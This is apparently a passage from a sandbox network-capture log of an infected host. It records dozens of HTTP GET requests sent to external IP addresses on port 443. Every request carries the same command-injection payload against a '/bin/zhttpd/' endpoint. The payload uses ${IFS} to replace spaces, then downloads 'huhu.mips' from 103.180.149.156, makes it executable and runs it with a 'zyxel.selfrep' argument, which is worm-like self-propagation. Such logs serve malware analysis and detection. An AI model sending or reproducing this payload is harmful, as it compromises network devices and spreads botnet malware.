                                                        Feb 2, 2024 06:21:22.180567980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7398192.168.2.143948032.173.46.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180625916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7399192.168.2.1438210220.10.168.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180654049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7400192.168.2.1434276143.11.74.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180684090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7401192.168.2.145302260.42.194.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180717945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7402192.168.2.145892084.41.45.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180763960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7403192.168.2.144144234.39.158.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180783033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7404192.168.2.1445490183.80.121.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180813074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7405192.168.2.145528277.108.70.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180856943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7406192.168.2.1459224149.17.146.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180902958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7407192.168.2.1439050167.150.107.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180933952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7408192.168.2.145142698.139.15.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180989027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7409192.168.2.1447436141.217.152.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180995941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7410192.168.2.1433668172.243.58.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181052923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7411192.168.2.1448524102.63.195.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181081057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7412192.168.2.145388262.149.211.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181103945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7413192.168.2.1447360126.106.155.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181126118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7414192.168.2.1448290222.208.53.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181181908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7415192.168.2.1451376168.149.233.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181200981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7416192.168.2.144953843.111.155.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181231976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7417192.168.2.145779452.244.250.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181277037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7418192.168.2.143783061.98.224.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181302071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7419192.168.2.144710254.185.89.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181360006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7420192.168.2.1436974149.174.11.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181394100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7421192.168.2.144223420.175.238.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181451082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7422192.168.2.1439544111.3.149.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181483984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7423192.168.2.146037892.83.1.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181514025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7424192.168.2.1447920111.73.66.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181544065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7425192.168.2.145354266.67.197.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181597948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7426192.168.2.14466709.120.192.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181646109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7427192.168.2.1460802158.194.214.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181674957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7428192.168.2.1453278147.131.150.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181705952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7429192.168.2.1435984121.168.20.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181735992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7430192.168.2.1444412140.206.70.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181775093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7431192.168.2.1434492104.189.202.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181807995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7432192.168.2.1438738186.9.233.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181839943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7433192.168.2.1453626213.124.80.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181899071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7434192.168.2.143750439.155.189.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181926012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7435192.168.2.1450046200.15.243.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.181971073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7436192.168.2.14571262.75.108.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182001114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7437192.168.2.1458956130.251.160.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182060957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7438192.168.2.144540432.29.247.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182085037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7439192.168.2.143988613.98.54.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182113886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7440192.168.2.143325258.183.220.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182143927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7441192.168.2.1439416187.252.83.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182183027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7442192.168.2.143868424.143.3.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182224035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7443192.168.2.1448358151.233.193.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182251930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7444192.168.2.145744442.239.183.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182291031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7445192.168.2.143958499.160.213.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182331085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7446192.168.2.143694097.102.222.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182368994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7447192.168.2.144963082.67.119.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182404041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7448192.168.2.1448830152.255.173.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182460070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7449192.168.2.1445968133.53.123.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182491064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7450192.168.2.143421052.158.241.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182518005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7451192.168.2.144466862.124.17.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182580948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7452192.168.2.144621858.220.189.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182615042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7453192.168.2.145519227.178.34.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182640076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7454192.168.2.143416689.86.46.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182688951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7455192.168.2.1440404165.254.28.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182719946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7456192.168.2.1457488220.159.248.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182775974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7457192.168.2.144950047.97.204.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182825089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7458192.168.2.145431894.34.73.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182864904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7459192.168.2.1438478199.34.162.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.182913065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7460192.168.2.145049251.160.141.169443
                                                        TimestampBytes transferredDirectionData
